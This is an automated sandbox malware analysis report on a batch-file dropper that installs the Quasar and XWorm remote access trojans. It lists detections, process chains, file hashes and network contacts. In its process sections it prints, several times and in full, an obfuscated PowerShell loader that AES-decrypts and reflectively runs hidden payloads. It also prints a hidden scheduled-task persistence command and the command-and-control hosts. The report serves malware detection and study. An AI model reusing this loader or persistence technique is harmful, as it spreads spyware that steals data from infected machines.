Malware Analysis Report

2024-10-23 21:28

Sample ID 240413-wk7t7afc78
Target Double.bat
SHA256 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f
Tags quasar xworm office04 rat spyware trojan
Score 10/10

Analysis Overview

Score 10/10
SHA256 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f
Threat Level: Known bad

The file Double.bat was found to be: Known bad.

Malicious Activity Summary

quasar xworm office04 rat spyware trojan

Xworm

Detect Xworm Payload

Quasar RAT

Quasar payload

Blocklisted process makes network request

Checks computer location settings

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-04-13 17:59

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted 2024-04-13 17:59
Reported 2024-04-13 18:01
Platform win10v2004-20240412-en
Max time kernel 54s
Max time network 63s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2364 wrote to memory of 1240 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1240 wrote to memory of 4476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1240 wrote to memory of 1308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1308 wrote to memory of 2776 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2776 wrote to memory of 5096 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5096 wrote to memory of 3112 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3112 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2028 wrote to memory of 4936 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2028 wrote to memory of 4276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4276 wrote to memory of 2280 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 3180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Double.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Double.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_330_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_330.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_330.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_330.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_330.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_330.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_585_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_585.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_585.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_585.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_585.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_585.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 express-divorce.gl.at.ply.gg udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 traffic-collins.gl.at.ply.gg udp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 130.118.77.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yiarmb3f.iuv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f8d49a4af7a844bfc7247d5670def557
SHA1 26ae0ce194a77a7a1887cf93741293fdfa6c94c4
SHA256 61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b
SHA512 9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

C:\Users\Admin\AppData\Roaming\startup_str_330.vbs

MD5 20b8c2322d21131b9f33f7f8aa143e41
SHA1 071b1e63bebd79345c9e62e8b81627fc639d611d
SHA256 0941acf3ffa1dc642b3b9913632e39fac19c63e97a3164159edb7edc5001f850
SHA512 91c13b7188947250f5e19b8f64862fb3142198523094ba89b1fb0dcb50e12686dc4e147c084efe59cfcd3eb210ea623e6f38d60abb8d59960dff70d388306524

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Roaming\startup_str_330.bat

MD5 948386c98184781df692e5f11ff558f7
SHA1 e8619faf83446ea78e456920834579bbf71aea20
SHA256 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f
SHA512 0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba

C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat

MD5 795363cfbf5d3fca47edc4cbc247a1c0
SHA1 9374d05486b0b62977825d07f748fa03cca3c864
SHA256 84c422d2ccda03230c8eecda7daa2e4ffa00a89d862bed459be52875dde096b6
SHA512 c5f147e4d011342d3518416b0d5d30f5adc8eeadac2b060a94abdd80ef8452a61cca997831d69473a13b52ad7aa8acb2ddf507dd3f49f68dfddaf6cbd7c23c94

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d51735559407dba515c4b8861b4c1a56
SHA1 4902dbc4f4322b549c42ddec8d2e642c96491e9d
SHA256 24cf099c1f20992a70fb72d21f41b766178f71ee7585bac522c8dbb3ae06f263
SHA512 fe1a23a0273c2cbf7510023f4368d19b4aab362baae6a35698e29c8232aeaf8261fc9e351549a9d9aa1130230769e6d8206cbf757056400b5cbc823e2dcc010a

C:\Users\Admin\AppData\Roaming\startup_str_585.vbs

MD5 753fefb78d188fffd02e5630c438f15e
SHA1 54712eb2b053ab77eab8c43339ee1bfefe877c29
SHA256 9151798d6f1e77daf9a6a495917d50bb3dc2f8b224fc29ee830caf4b3195fe26
SHA512 558240ecabdcaeed3c2358fdebb718e49f7f2b5b4d4735c2c16809c727d88c5cca141b27af9ff0daccfb52208851a9251abd06ed2ac75cb496c228dc06da59fb

Analysis: behavioral3

Detonation Overview

Submitted 2024-04-13 17:59
Reported 2024-04-13 18:01
Platform win11-20240412-en
Max time kernel 54s
Max time network 62s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-801765966-3955847401-2235691403-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2412 wrote to memory of 4116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 4116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4116 wrote to memory of 4408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4116 wrote to memory of 4408 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4116 wrote to memory of 1088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4116 wrote to memory of 1088 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1088 wrote to memory of 1400 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1088 wrote to memory of 1400 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1400 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1400 wrote to memory of 3932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3932 wrote to memory of 1768 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3932 wrote to memory of 1768 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1768 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3728 wrote to memory of 236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3728 wrote to memory of 236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3728 wrote to memory of 3572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3728 wrote to memory of 3572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3572 wrote to memory of 4360 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3572 wrote to memory of 4360 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4360 wrote to memory of 4120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4360 wrote to memory of 4120 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Double.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Double.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

